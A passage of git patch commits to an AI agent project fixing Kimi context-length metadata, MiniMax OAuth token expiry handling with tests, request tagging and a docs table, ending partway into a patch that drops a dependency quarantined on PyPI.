From 528bba67340f6efaac8e99f13b6d52eda9f8a5e3 Mon Sep 17 00:00:00 2001
From: rob-maron <132852777+rob-maron@users.noreply.github.com>
Date: Tue, 12 May 2026 00:24:01 -0400
Subject: [PATCH 01/59] fix kimi

---
 agent/model_metadata.py | 38 +++++++++++++++++++++++++++++++++++---
 1 file changed, 35 insertions(+), 3 deletions(-)

diff --git a/agent/model_metadata.py b/agent/model_metadata.py
index 12d5f4170bf..f103001ab38 100644
--- a/agent/model_metadata.py
+++ b/agent/model_metadata.py
@@ -1338,16 +1338,37 @@ def _resolve_nous_context_length(model: str) -> Optional[int]:
     with version normalization (dot↔dash).
     """
     metadata = fetch_model_metadata()  # OpenRouter cache
+
+    def _safe_ctx(or_id: str, entry: dict) -> Optional[int]:
+        """Return context length, but reject stale 32k values for Kimi models.
+
+        OpenRouter reports 32768 for moonshotai/kimi-k2.6 and similar Kimi
+        models; the actual supported context is 262144.  Apply the same guard
+        used for the generic OpenRouter path (step 6 in resolve_context_length)
+        so the Nous portal path does not short-circuit it.
+        """
+        ctx = entry.get("context_length")
+        if ctx is None:
+            return None
+        if ctx == 32768 and _model_name_suggests_kimi(or_id):
+            logger.info(
+                "Rejecting OpenRouter metadata context=%s for %r "
+                "(Kimi-family underreport, Nous path); falling through to hardcoded defaults",
+                ctx, or_id,
+            )
+            return None
+        return ctx
+
     # Exact match first
     if model in metadata:
-        return metadata[model].get("context_length")
+        return _safe_ctx(model, metadata[model])
 
     normalized = _normalize_model_version(model).lower()
 
     for or_id, entry in metadata.items():
         bare = or_id.split("/", 1)[1] if "/" in or_id else or_id
         if bare.lower() == model.lower() or _normalize_model_version(bare).lower() == normalized:
-            return entry.get("context_length")
+            return _safe_ctx(or_id, entry)
 
     # Partial prefix match for cases like gemini-3-flash → gemini-3-flash-preview
     # Require match to be at a word boundary (followed by -, :, or end of string)
@@ -1358,7 +1379,7 @@ def _resolve_nous_context_length(model: str) -> Optional[int]:
             if candidate.startswith(query) and (
                 len(candidate) == len(query) or candidate[len(query)] in "-:."
             ):
-                return entry.get("context_length")
+                return _safe_ctx(or_id, entry)
 
     return None
 
@@ -1437,6 +1458,17 @@ def get_model_context_length(
                     model, base_url, f"{cached:,}",
                 )
                 _invalidate_cached_context_length(model, base_url)
+            # Invalidate stale 32k cache entries for Kimi-family models.
+            # OpenRouter incorrectly reports 32768 for moonshotai/kimi-k2.6 and
+            # similar models; actual context is 262144.  Drop any cached 32k
+            # value so the corrected resolution path can return 262144.
+            elif cached <= 32768 and _model_name_suggests_kimi(model):
+                logger.info(
+                    "Dropping stale Kimi cache entry %s@%s -> %s (OpenRouter underreport); "
+                    "re-resolving via hardcoded defaults",
+                    model, base_url, f"{cached:,}",
+                )
+                _invalidate_cached_context_length(model, base_url)
             else:
                 return cached
 

From 057fc7b073731934e56850f913dbc85aa5d6ac26 Mon Sep 17 00:00:00 2001
From: rob-maron <132852777+rob-maron@users.noreply.github.com>
Date: Tue, 12 May 2026 00:25:40 -0400
Subject: [PATCH 02/59] fix guard

---
 agent/model_metadata.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/agent/model_metadata.py b/agent/model_metadata.py
index f103001ab38..4bf181cf591 100644
--- a/agent/model_metadata.py
+++ b/agent/model_metadata.py
@@ -1350,7 +1350,7 @@ def _resolve_nous_context_length(model: str) -> Optional[int]:
         ctx = entry.get("context_length")
         if ctx is None:
             return None
-        if ctx == 32768 and _model_name_suggests_kimi(or_id):
+        if ctx <= 32768 and _model_name_suggests_kimi(or_id):
             logger.info(
                 "Rejecting OpenRouter metadata context=%s for %r "
                 "(Kimi-family underreport, Nous path); falling through to hardcoded defaults",

From f0c2964f0b5a0e84e06d07ae6de7432ad792c23a Mon Sep 17 00:00:00 2001
From: rob-maron <132852777+rob-maron@users.noreply.github.com>
Date: Tue, 12 May 2026 00:26:38 -0400
Subject: [PATCH 03/59] remove comments

---
 agent/model_metadata.py | 11 -----------
 1 file changed, 11 deletions(-)

diff --git a/agent/model_metadata.py b/agent/model_metadata.py
index 4bf181cf591..a3fa8d57981 100644
--- a/agent/model_metadata.py
+++ b/agent/model_metadata.py
@@ -1459,9 +1459,6 @@ def get_model_context_length(
                 )
                 _invalidate_cached_context_length(model, base_url)
             # Invalidate stale 32k cache entries for Kimi-family models.
-            # OpenRouter incorrectly reports 32768 for moonshotai/kimi-k2.6 and
-            # similar models; actual context is 262144.  Drop any cached 32k
-            # value so the corrected resolution path can return 262144.
             elif cached <= 32768 and _model_name_suggests_kimi(model):
                 logger.info(
                     "Dropping stale Kimi cache entry %s@%s -> %s (OpenRouter underreport); "
@@ -1607,14 +1604,6 @@ def get_model_context_length(
         if model in metadata:
             or_ctx = metadata[model].get("context_length", DEFAULT_FALLBACK_CONTEXT)
             # Guard against stale OpenRouter metadata for Kimi-family models.
-            # OpenRouter reports 32768 for moonshotai/kimi-k2.6, but the model
-            # actually supports 262144 (models.dev + official Kimi docs agree).
-            # Providers that host their own Kimi endpoints (Ollama Cloud, Kimi
-            # Coding, Moonshot) would otherwise trip the 64k minimum-context
-            # guard and reject a perfectly capable model.
-            # The filter is narrow: only reject exactly 32768 for Kimi-named
-            # models.  If OpenRouter ever updates its data, the stale path
-            # becomes dead code with no impact.
             if or_ctx == 32768 and _model_name_suggests_kimi(model):
                 logger.info(
                     "Rejecting OpenRouter metadata context=%s for %r "

From 32abe742fa81bee3acb42a274b2501afe1657c08 Mon Sep 17 00:00:00 2001
From: rob-maron <132852777+rob-maron@users.noreply.github.com>
Date: Tue, 12 May 2026 00:27:56 -0400
Subject: [PATCH 04/59] fix comment

---
 agent/model_metadata.py | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/agent/model_metadata.py b/agent/model_metadata.py
index a3fa8d57981..100c33a136c 100644
--- a/agent/model_metadata.py
+++ b/agent/model_metadata.py
@@ -1342,10 +1342,8 @@ def _resolve_nous_context_length(model: str) -> Optional[int]:
     def _safe_ctx(or_id: str, entry: dict) -> Optional[int]:
         """Return context length, but reject stale 32k values for Kimi models.
 
-        OpenRouter reports 32768 for moonshotai/kimi-k2.6 and similar Kimi
-        models; the actual supported context is 262144.  Apply the same guard
-        used for the generic OpenRouter path (step 6 in resolve_context_length)
-        so the Nous portal path does not short-circuit it.
+        Apply the same guard used for the generic OpenRouter path (step 6 in 
+        resolve_context_length) so the Nous portal path does not short-circuit it.
         """
         ctx = entry.get("context_length")
         if ctx is None:

From 58e2109f10b5ea5e29b6c4011187762f9358c4a8 Mon Sep 17 00:00:00 2001
From: Austin Pickett <pickett.austin@gmail.com>
Date: Mon, 11 May 2026 21:25:41 -0700
Subject: [PATCH 05/59] fix(minimax): harden OAuth dashboard and runtime

Handle MiniMax OAuth expiry values consistently across CLI and dashboard
flows, fix CLI status/add behavior, and force pooled OAuth runtime
requests through Anthropic Messages.

- web_server._minimax_poller: parse expired_in via the shared resolver
  so unix-ms absolute timestamps stop landing as TTL seconds and crashing
  with 'year 583911 is out of range' when a user connects MiniMax OAuth
  from the dashboard.
- auth._minimax_oauth_login / _refresh_minimax_oauth_state: same fix on
  the CLI login + refresh paths.
- auth.get_auth_status: dispatch minimax-oauth to its dedicated status
  function instead of falling through.
- auth_commands.auth_add_command: 'hermes auth add minimax-oauth' now
  starts the device-code login flow and persists a pool entry with the
  access + refresh tokens, instead of requiring credentials to already
  exist.
- runtime_provider._resolve_runtime_from_pool_entry: pin pooled
  minimax-oauth credentials to anthropic_messages so a stale
  model.api_mode: chat_completions can't send requests to
  /anthropic/chat/completions and trigger MiniMax nginx 404s.

Co-authored-by: Cursor <cursoragent@cursor.com>
---
 hermes_cli/auth.py                            | 41 +++++++---
 hermes_cli/auth_commands.py                   | 13 ++--
 hermes_cli/runtime_provider.py                |  8 ++
 hermes_cli/web_server.py                      |  7 +-
 tests/hermes_cli/test_auth_commands.py        | 44 +++++++++++
 .../test_runtime_provider_resolution.py       | 36 +++++++++
 tests/hermes_cli/test_web_oauth_dispatch.py   | 49 ++++++++++++
 tests/test_minimax_oauth.py                   | 74 +++++++++++++++++++
 8 files changed, 254 insertions(+), 18 deletions(-)

diff --git a/hermes_cli/auth.py b/hermes_cli/auth.py
index 6fda05d8fd3..ac102d0be76 100644
--- a/hermes_cli/auth.py
+++ b/hermes_cli/auth.py
@@ -4046,6 +4046,8 @@ def get_auth_status(provider_id: Optional[str] = None) -> Dict[str, Any]:
         return get_qwen_auth_status()
     if target == "google-gemini-cli":
         return get_gemini_oauth_auth_status()
+    if target == "minimax-oauth":
+        return get_minimax_oauth_auth_status()
     if target == "copilot-acp":
         return get_external_process_provider_status(target)
     # API-key providers
@@ -4757,6 +4759,20 @@ def _minimax_request_user_code(
     return payload
 
 
+def _minimax_expired_in_looks_like_unix_ms(expired_in: int, *, now_ms: int) -> bool:
+    """True if ``expired_in`` is plausibly a unix-ms absolute time (vs TTL seconds)."""
+    return int(expired_in) > (now_ms // 2)
+
+
+def _minimax_resolve_token_expiry_unix(expired_in: int, *, now: datetime) -> float:
+    """Return access-token expiry as unix seconds (MiniMax uses ms epoch or TTL seconds)."""
+    raw = int(expired_in)
+    now_ms = int(now.timestamp() * 1000)
+    if _minimax_expired_in_looks_like_unix_ms(raw, now_ms=now_ms):
+        return raw / 1000.0
+    return now.timestamp() + max(1, raw)
+
+
 def _minimax_poll_token(
     client: httpx.Client, *, portal_base_url: str, client_id: str,
     user_code: str, code_verifier: str, expired_in: int, interval_ms: Optional[int],
@@ -4765,12 +4781,11 @@ def _minimax_poll_token(
     # Defensive parsing: if it's small enough to be a duration, treat as seconds.
     import time as _time
     now_ms = int(_time.time() * 1000)
-    if expired_in > now_ms // 2:
-        # Looks like a unix-ms timestamp.
-        deadline = expired_in / 1000.0
+    raw = int(expired_in)
+    if _minimax_expired_in_looks_like_unix_ms(raw, now_ms=now_ms):
+        deadline = raw / 1000.0
     else:
-        # Treat as duration in seconds from now.
-        deadline = _time.time() + max(1, expired_in)
+        deadline = _time.time() + max(1, raw)
     interval = max(2.0, (interval_ms or 2000) / 1000.0)
 
     while _time.time() < deadline:
@@ -4884,8 +4899,10 @@ def _minimax_oauth_login(
         )
 
     now = datetime.now(timezone.utc)
-    expires_in_s = int(token_data["expired_in"])
-    expires_at = now.timestamp() + expires_in_s
+    expires_at_unix = _minimax_resolve_token_expiry_unix(
+        int(token_data["expired_in"]), now=now,
+    )
+    expires_in_s = max(0, int(expires_at_unix - now.timestamp()))
 
     auth_state = {
         "provider": "minimax-oauth",
@@ -4899,7 +4916,7 @@ def _minimax_oauth_login(
         "refresh_token": token_data["refresh_token"],
         "resource_url": token_data.get("resource_url"),
         "obtained_at": now.isoformat(),
-        "expires_at": datetime.fromtimestamp(expires_at, tz=timezone.utc).isoformat(),
+        "expires_at": datetime.fromtimestamp(expires_at_unix, tz=timezone.utc).isoformat(),
         "expires_in": expires_in_s,
     }
 
@@ -4960,14 +4977,16 @@ def _refresh_minimax_oauth_state(
             relogin_required=True,
         )
     now_dt = datetime.now(timezone.utc)
-    expires_in_s = int(payload["expired_in"])
+    expires_at_unix = _minimax_resolve_token_expiry_unix(
+        int(payload["expired_in"]), now=now_dt,
+    )
+    expires_in_s = max(0, int(expires_at_unix - now_dt.timestamp()))
     new_state = dict(state)
     new_state.update({
         "access_token": payload["access_token"],
         "refresh_token": payload.get("refresh_token", state["refresh_token"]),
         "obtained_at": now_dt.isoformat(),
-        "expires_at": datetime.fromtimestamp(now_dt.timestamp() + expires_in_s,
-                                             tz=timezone.utc).isoformat(),
+        "expires_at": datetime.fromtimestamp(expires_at_unix, tz=timezone.utc).isoformat(),
         "expires_in": expires_in_s,
     })
     _minimax_save_auth_state(new_state)
diff --git a/hermes_cli/auth_commands.py b/hermes_cli/auth_commands.py
index b701a54725a..65cb7ed1b85 100644
--- a/hermes_cli/auth_commands.py
+++ b/hermes_cli/auth_commands.py
@@ -375,10 +375,12 @@ def auth_add_command(args) -> None:
         return
 
     if provider == "minimax-oauth":
-        from hermes_cli.auth import resolve_minimax_oauth_runtime_credentials
-        creds = resolve_minimax_oauth_runtime_credentials()
+        creds = auth_mod._minimax_oauth_login(
+            open_browser=not getattr(args, "no_browser", False),
+            timeout_seconds=getattr(args, "timeout", None) or 15.0,
+        )
         label = (getattr(args, "label", None) or "").strip() or label_from_token(
-            creds["api_key"],
+            creds["access_token"],
             _oauth_default_label(provider, len(pool.entries()) + 1),
         )
         entry = PooledCredential(
@@ -388,8 +390,9 @@ def auth_add_command(args) -> None:
             auth_type=AUTH_TYPE_OAUTH,
             priority=0,
             source=f"{SOURCE_MANUAL}:minimax_oauth",
-            access_token=creds["api_key"],
-            base_url=creds.get("base_url"),
+            access_token=creds["access_token"],
+            refresh_token=creds.get("refresh_token"),
+            base_url=creds.get("inference_base_url"),
         )
         pool.add_entry(entry)
         print(f'Added {provider} OAuth credential #{len(pool.entries())}: "{entry.label}"')
diff --git a/hermes_cli/runtime_provider.py b/hermes_cli/runtime_provider.py
index 1cc41ceae95..1652b72034c 100644
--- a/hermes_cli/runtime_provider.py
+++ b/hermes_cli/runtime_provider.py
@@ -205,6 +205,14 @@ def _resolve_runtime_from_pool_entry(
     elif provider == "google-gemini-cli":
         api_mode = "chat_completions"
         base_url = base_url or "cloudcode-pa://google"
+    elif provider == "minimax-oauth":
+        # MiniMax OAuth tokens are valid only against the Anthropic Messages
+        # compatible endpoint. Do not honor stale model.api_mode values from a
+        # prior OpenAI-compatible provider, or the client will hit
+        # /chat/completions under /anthropic and receive a bare nginx 404.
+        api_mode = "anthropic_messages"
+        pconfig = PROVIDER_REGISTRY.get(provider)
+        base_url = base_url or (pconfig.inference_base_url if pconfig else "")
     elif provider == "anthropic":
         api_mode = "anthropic_messages"
         cfg_provider = str(model_cfg.get("provider") or "").strip().lower()
diff --git a/hermes_cli/web_server.py b/hermes_cli/web_server.py
index 4a4b8d4b5ab..0da49682b22 100644
--- a/hermes_cli/web_server.py
+++ b/hermes_cli/web_server.py
@@ -2053,6 +2053,7 @@ def _minimax_poller(session_id: str) -> None:
     """
     from hermes_cli.auth import (
         _minimax_poll_token,
+        _minimax_resolve_token_expiry_unix,
         _minimax_save_auth_state,
         MINIMAX_OAUTH_GLOBAL_INFERENCE,
         MINIMAX_OAUTH_SCOPE,
@@ -2090,8 +2091,10 @@ def _minimax_poller(session_id: str) -> None:
         # dashboard path; cn-region operators can still use the CLI
         # flow which supports `--region cn`.
         now = datetime.now(timezone.utc)
-        expires_in_s = int(token_data["expired_in"])
-        expires_at_ts = now.timestamp() + expires_in_s
+        expires_at_ts = _minimax_resolve_token_expiry_unix(
+            int(token_data["expired_in"]), now=now,
+        )
+        expires_in_s = max(0, int(expires_at_ts - now.timestamp()))
         auth_state = {
             "provider": "minimax-oauth",
             "region": sess.get("region", "global"),
diff --git a/tests/hermes_cli/test_auth_commands.py b/tests/hermes_cli/test_auth_commands.py
index 50f639d08ac..74e2a64d312 100644
--- a/tests/hermes_cli/test_auth_commands.py
+++ b/tests/hermes_cli/test_auth_commands.py
@@ -170,6 +170,50 @@ def test_auth_add_nous_oauth_persists_pool_entry(tmp_path, monkeypatch):
     assert singleton["inference_base_url"] == "https://inference.example.com/v1"
 
 
+def test_auth_add_minimax_oauth_starts_login_and_persists_pool_entry(tmp_path, monkeypatch):
+    monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
+    _write_auth_store(tmp_path, {"version": 1, "providers": {}})
+    token = _jwt_with_email("minimax@example.com")
+    monkeypatch.setattr(
+        "hermes_cli.auth._minimax_oauth_login",
+        lambda **kwargs: {
+            "provider": "minimax-oauth",
+            "region": "global",
+            "portal_base_url": "https://api.minimax.io",
+            "inference_base_url": "https://api.minimax.io/anthropic",
+            "client_id": "client-id",
+            "scope": "group_id profile model.completion",
+            "token_type": "Bearer",
+            "access_token": token,
+            "refresh_token": "refresh-token",
+            "resource_url": None,
+            "obtained_at": "2026-05-11T10:00:00+00:00",
+            "expires_at": "2026-05-14T10:00:00+00:00",
+            "expires_in": 259200,
+        },
+    )
+
+    from hermes_cli.auth_commands import auth_add_command
+
+    class _Args:
+        provider = "minimax-oauth"
+        auth_type = "oauth"
+        api_key = None
+        label = None
+        no_browser = True
+        timeout = None
+
+    auth_add_command(_Args())
+
+    payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
+    entries = payload["credential_pool"]["minimax-oauth"]
+    entry = next(item for item in entries if item["source"] == "manual:minimax_oauth")
+    assert entry["label"] == "minimax@example.com"
+    assert entry["access_token"] == token
+    assert entry["refresh_token"] == "refresh-token"
+    assert entry["base_url"] == "https://api.minimax.io/anthropic"
+
+
 def test_auth_add_nous_oauth_honors_custom_label(tmp_path, monkeypatch):
     """`hermes auth add nous --type oauth --label <name>` must preserve the
     custom label end-to-end — it was silently dropped in the first cut of the
diff --git a/tests/hermes_cli/test_runtime_provider_resolution.py b/tests/hermes_cli/test_runtime_provider_resolution.py
index d17b1a41e3a..22c778dbab2 100644
--- a/tests/hermes_cli/test_runtime_provider_resolution.py
+++ b/tests/hermes_cli/test_runtime_provider_resolution.py
@@ -2285,3 +2285,39 @@ def test_minimax_oauth_runtime_uses_inference_base_url(monkeypatch):
     resolved = rp.resolve_runtime_provider(requested="minimax-oauth")
 
     assert MINIMAX_OAUTH_CN_INFERENCE.rstrip("/") in resolved["base_url"]
+
+
+def test_minimax_oauth_pool_forces_anthropic_messages_despite_stale_config(monkeypatch):
+    """A pooled MiniMax OAuth token must not inherit stale chat_completions config."""
+
+    class _Entry:
+        access_token = "oauth-token"
+        source = "manual:minimax_oauth"
+        base_url = "https://api.minimax.io/anthropic"
+
+    class _Pool:
+        def has_credentials(self):
+            return True
+
+        def select(self):
+            return _Entry()
+
+    monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "minimax-oauth")
+    monkeypatch.setattr(
+        rp,
+        "_get_model_config",
+        lambda: {
+            "provider": "minimax-oauth",
+            "default": "MiniMax-M2.7",
+            "api_mode": "chat_completions",
+        },
+    )
+    monkeypatch.setattr(rp, "load_pool", lambda provider: _Pool())
+    monkeypatch.setattr(rp, "_resolve_named_custom_runtime", lambda **k: None)
+    monkeypatch.setattr(rp, "_resolve_explicit_runtime", lambda **k: None)
+
+    resolved = rp.resolve_runtime_provider(requested="minimax-oauth")
+
+    assert resolved["provider"] == "minimax-oauth"
+    assert resolved["api_mode"] == "anthropic_messages"
+    assert resolved["base_url"] == "https://api.minimax.io/anthropic"
diff --git a/tests/hermes_cli/test_web_oauth_dispatch.py b/tests/hermes_cli/test_web_oauth_dispatch.py
index 6ebd0ad7235..23b72a303cf 100644
--- a/tests/hermes_cli/test_web_oauth_dispatch.py
+++ b/tests/hermes_cli/test_web_oauth_dispatch.py
@@ -19,6 +19,8 @@ The fix:
 
 These tests pin the corrected behavior.
 """
+import time
+from datetime import datetime, timezone
 from unittest.mock import patch
 
 import pytest
@@ -67,6 +69,53 @@ def test_minimax_login_does_not_launch_anthropic_flow():
     assert body["expires_in"] == 600
 
 
+def test_minimax_dashboard_poller_accepts_absolute_ms_expired_in():
+    """Dashboard MiniMax completion must accept unix-ms token expiry values."""
+    from hermes_cli import web_server as ws
+
+    now = datetime.now(timezone.utc)
+    abs_ms = int((now.timestamp() + 1800) * 1000)
+    session_id = "minimax-absolute-ms-test"
+    ws._oauth_sessions[session_id] = {
+        "session_id": session_id,
+        "provider": "minimax-oauth",
+        "flow": "device_code",
+        "created_at": time.time(),
+        "status": "pending",
+        "error_message": None,
+        "portal_base_url": "https://api.minimax.io",
+        "client_id": "client-id",
+        "user_code": "ABCD-1234",
+        "code_verifier": "verifier",
+        "interval_ms": 2000,
+        "expired_in_raw": abs_ms,
+        "region": "global",
+    }
+    captured_state = {}
+
+    try:
+        with patch(
+            "hermes_cli.auth._minimax_poll_token",
+            return_value={
+                "status": "success",
+                "access_token": "access",
+                "refresh_token": "refresh",
+                "expired_in": abs_ms,
+                "token_type": "Bearer",
+            },
+        ), patch(
+            "hermes_cli.auth._minimax_save_auth_state",
+            side_effect=lambda state: captured_state.update(state),
+        ):
+            ws._minimax_poller(session_id)
+    finally:
+        ws._oauth_sessions.pop(session_id, None)
+
+    assert captured_state["access_token"] == "access"
+    assert 1790 <= captured_state["expires_in"] <= 1810
+    assert datetime.fromisoformat(captured_state["expires_at"]).year < 9999
+
+
 def test_anthropic_pkce_branch_still_works():
     """Sanity: the dispatcher tightening doesn't break the legitimate Anthropic PKCE path."""
     fake_anthropic_response = {
diff --git a/tests/test_minimax_oauth.py b/tests/test_minimax_oauth.py
index 0e63800e917..f5ac4e28c62 100644
--- a/tests/test_minimax_oauth.py
+++ b/tests/test_minimax_oauth.py
@@ -32,9 +32,11 @@ from hermes_cli.auth import (
     _minimax_pkce_pair,
     _minimax_request_user_code,
     _minimax_poll_token,
+    _minimax_resolve_token_expiry_unix,
     _refresh_minimax_oauth_state,
     resolve_minimax_oauth_runtime_credentials,
     get_minimax_oauth_auth_status,
+    get_auth_status,
     get_provider_auth_state,
 )
 
@@ -67,6 +69,23 @@ def _past_iso(seconds_ago: int = 3600) -> str:
     return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()
 
 
+# ---------------------------------------------------------------------------
+# 0. test_resolve_token_expiry_unix_ttl_vs_absolute_ms
+# ---------------------------------------------------------------------------
+
+def test_resolve_token_expiry_unix_ttl_seconds():
+    now = datetime(2025, 6, 1, 12, 0, 0, tzinfo=timezone.utc)
+    got = _minimax_resolve_token_expiry_unix(3600, now=now)
+    assert abs(got - (now.timestamp() + 3600)) < 0.01
+
+
+def test_resolve_token_expiry_unix_absolute_ms():
+    now = datetime(2025, 6, 1, 12, 0, 0, tzinfo=timezone.utc)
+    abs_ms = int((now.timestamp() + 7200) * 1000)
+    got = _minimax_resolve_token_expiry_unix(abs_ms, now=now)
+    assert abs(got - (now.timestamp() + 7200)) < 0.01
+
+
 # ---------------------------------------------------------------------------
 # 1. test_pkce_pair_produces_valid_s256
 # ---------------------------------------------------------------------------
@@ -362,6 +381,46 @@ def test_refresh_updates_access_token():
     assert result["expires_in"] == 7200
 
 
+def test_refresh_updates_access_token_absolute_ms_expired_in():
+    """Refresh payload may use unix-ms absolute ``expired_in`` (same as device-code)."""
+    now0 = datetime.now(timezone.utc)
+    abs_ms = int((now0.timestamp() + 1800) * 1000)
+
+    state = {
+        "access_token": "old-access",
+        "refresh_token": "my-refresh",
+        "portal_base_url": MINIMAX_OAUTH_GLOBAL_BASE,
+        "client_id": MINIMAX_OAUTH_CLIENT_ID,
+        "inference_base_url": MINIMAX_OAUTH_GLOBAL_INFERENCE,
+        "expires_at": _future_iso(MINIMAX_OAUTH_REFRESH_SKEW_SECONDS - 1),
+    }
+
+    new_token_body = {
+        "status": "success",
+        "access_token": "new-access",
+        "refresh_token": "new-refresh",
+        "expired_in": abs_ms,
+    }
+
+    mock_resp = _make_httpx_response(200, new_token_body)
+
+    with patch("httpx.Client") as mock_client_class:
+        mock_client_instance = MagicMock()
+        mock_client_instance.__enter__ = MagicMock(return_value=mock_client_instance)
+        mock_client_instance.__exit__ = MagicMock(return_value=False)
+        mock_client_instance.post.return_value = mock_resp
+        mock_client_class.return_value = mock_client_instance
+
+        with patch("hermes_cli.auth._minimax_save_auth_state"):
+            result = _refresh_minimax_oauth_state(state)
+
+    assert result["access_token"] == "new-access"
+    assert 1790 <= result["expires_in"] <= 1810
+    exp = datetime.fromisoformat(result["expires_at"].replace("Z", "+00:00"))
+    skew = exp.timestamp() - datetime.now(timezone.utc).timestamp()
+    assert 1790 <= skew <= 1810
+
+
 # ---------------------------------------------------------------------------
 # 10. test_refresh_reuse_triggers_relogin_required
 # ---------------------------------------------------------------------------
@@ -464,3 +523,18 @@ def test_get_minimax_oauth_auth_status_logged_in():
 
     assert status["logged_in"] is True
     assert status["region"] == "global"
+
+
+def test_generic_auth_status_dispatches_minimax_oauth():
+    state = {
+        "access_token": "tok",
+        "expires_at": _future_iso(3600),
+        "region": "global",
+    }
+
+    with patch("hermes_cli.auth.get_provider_auth_state", return_value=state):
+        status = get_auth_status("minimax-oauth")
+
+    assert status["logged_in"] is True
+    assert status["provider"] == "minimax-oauth"
+    assert status["region"] == "global"

From 94d9db72ba5fdca8b34f7d7767e1750efd5dd952 Mon Sep 17 00:00:00 2001
From: Robin Fernandes <robin@soal.org>
Date: Tue, 12 May 2026 15:29:13 +1000
Subject: [PATCH 06/59] add client marker tag on aux inference requests

---
 agent/auxiliary_client.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/agent/auxiliary_client.py b/agent/auxiliary_client.py
index 7b53566a927..da69f040bb1 100644
--- a/agent/auxiliary_client.py
+++ b/agent/auxiliary_client.py
@@ -382,7 +382,7 @@ _AI_GATEWAY_HEADERS = {
 # Nous Portal extra_body for product attribution.
 # Callers should pass this as extra_body in chat.completions.create()
 # when the auxiliary client is backed by Nous Portal.
-NOUS_EXTRA_BODY = {"tags": ["product=hermes-agent"]}
+NOUS_EXTRA_BODY = {"tags": ["product=hermes-agent", "client=aux"]}
 
 # Set at resolve time — True if the auxiliary client points to Nous Portal
 auxiliary_is_nous: bool = False
@@ -4026,7 +4026,7 @@ def _build_call_kwargs(
     # Provider-specific extra_body
     merged_extra = dict(extra_body or {})
     if provider == "nous" or auxiliary_is_nous:
-        merged_extra.setdefault("tags", []).extend(["product=hermes-agent"])
+        merged_extra.setdefault("tags", []).extend(NOUS_EXTRA_BODY["tags"])
     if merged_extra:
         kwargs["extra_body"] = merged_extra
 

From 407683b72db0017f74eb7bc3b84e052f6b2e19c7 Mon Sep 17 00:00:00 2001
From: nightcityblade <nightcityblade@gmail.com>
Date: Tue, 12 May 2026 11:15:04 +0800
Subject: [PATCH 07/59] fix(docs): repair Voice & TTS provider table

Fixes NousResearch/hermes-agent#24101
---
 website/docs/integrations/index.md | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/website/docs/integrations/index.md b/website/docs/integrations/index.md
index 444e07660f8..21235a12ba1 100644
--- a/website/docs/integrations/index.md
+++ b/website/docs/integrations/index.md
@@ -56,12 +56,12 @@ See [Browser Automation](/docs/user-guide/features/browser) for setup and usage.
 Text-to-speech and speech-to-text across all messaging platforms:
 
 | Provider | Quality | Cost | API Key |
-||----------|---------|------|---------|
-|| **Edge TTS** (default) | Good | Free | None needed |
-|| **ElevenLabs** | Excellent | Paid | `ELEVENLABS_API_KEY` |
-|| **OpenAI TTS** | Good | Paid | `VOICE_TOOLS_OPENAI_KEY` |
-|| **MiniMax** | Good | Paid | `MINIMAX_API_KEY` |
-|| **NeuTTS** | Good | Free | None needed |
+|----------|---------|------|---------|
+| **Edge TTS** (default) | Good | Free | None needed |
+| **ElevenLabs** | Excellent | Paid | `ELEVENLABS_API_KEY` |
+| **OpenAI TTS** | Good | Paid | `VOICE_TOOLS_OPENAI_KEY` |
+| **MiniMax** | Good | Paid | `MINIMAX_API_KEY` |
+| **NeuTTS** | Good | Free | None needed |
 
 Speech-to-text supports six providers: local faster-whisper (free, runs on-device), a local command wrapper, Groq, OpenAI Whisper API, Mistral, and xAI. Voice message transcription works across Telegram, Discord, WhatsApp, and other messaging platforms. See [Voice & TTS](/docs/user-guide/features/tts) and [Voice Mode](/docs/user-guide/features/voice-mode) for details.
 

From 99ad2d1372d3b5ff9134e9d8930fed6de4fc7b62 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Mon, 11 May 2026 23:02:15 -0700
Subject: [PATCH 08/59] =?UTF-8?q?fix(deps):=20unbreak=20[all]=20install=20?=
 =?UTF-8?q?=E2=80=94=20drop=20mistralai=20while=20PyPI=20quarantined=20(#2?=
 =?UTF-8?q?4205)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

The `mistralai` PyPI package was quarantined on 2026-05-12 after a
malicious 2.4.6 release. Every fresh resolve (AUR makepkg, Docker build,
CI run, install.sh first-run) currently fails on
`mistralai>=2.3.0,<3` because PyPI returns zero candidates.

Existing users running `hermes update` mostly didn't notice — `hermes
update` falls back from `.[all]` to per-extra retries and silently
skips mistral with a warning that scrolls past. But fresh installs
hard-fail or lose every other extra.

Changes:
- pyproject.toml: drop `hermes-agent[mistral]` from `[all]` and
  `[termux-all]`. The `mistral` extra itself is preserved so users
  can opt back in once PyPI un-quarantines.
- hermes_cli/tools_config.py: hide Mistral Voxtral TTS from the
  `hermes tools` provider picker until restored.
- hermes_cli/web_server.py: drop "mistral" from dashboard STT options.
- tools/transcription_tools.py: explicit `provider: mistral` returns
  "none" with a clear status message; auto-detect skips mistral.
- tools/tts_tool.py: dispatcher returns a clear "temporarily disabled"
  error before any SDK import attempt (avoids cached-stale-package
  surprises).
- tests/tools/: update three test files to assert the new disabled
  behavior. Each test docstring records why and points at the rollback
  trigger (PyPI un-quarantines mistralai).

Restore plan: revert this commit once the package is available on PyPI
again. The behavior change is intentional and documented in code
comments + test docstrings to make the rollback trivial.

Validation:
- scripts/run_tests.sh tests/tools/ -k 'mistral or stt or tts' →
  425/425 passing.

Refs: https://pypi.org/simple/mistralai/ (currently
"pypi:project-status: quarantined").
---
 hermes_cli/tools_config.py                    | 12 ++-----
 hermes_cli/web_server.py                      |  4 ++-
 pyproject.toml                                | 11 ++++--
 .../test_transcription_dotenv_fallback.py     |  8 ++++-
 tests/tools/test_transcription_tools.py       | 35 ++++++++++++++-----
 tests/tools/test_tts_mistral.py               | 23 +++++++-----
 tools/transcription_tools.py                  | 20 ++++++-----
 tools/tts_tool.py                             | 25 +++++++------
 8 files changed, 90 insertions(+), 48 deletions(-)

diff --git a/hermes_cli/tools_config.py b/hermes_cli/tools_config.py
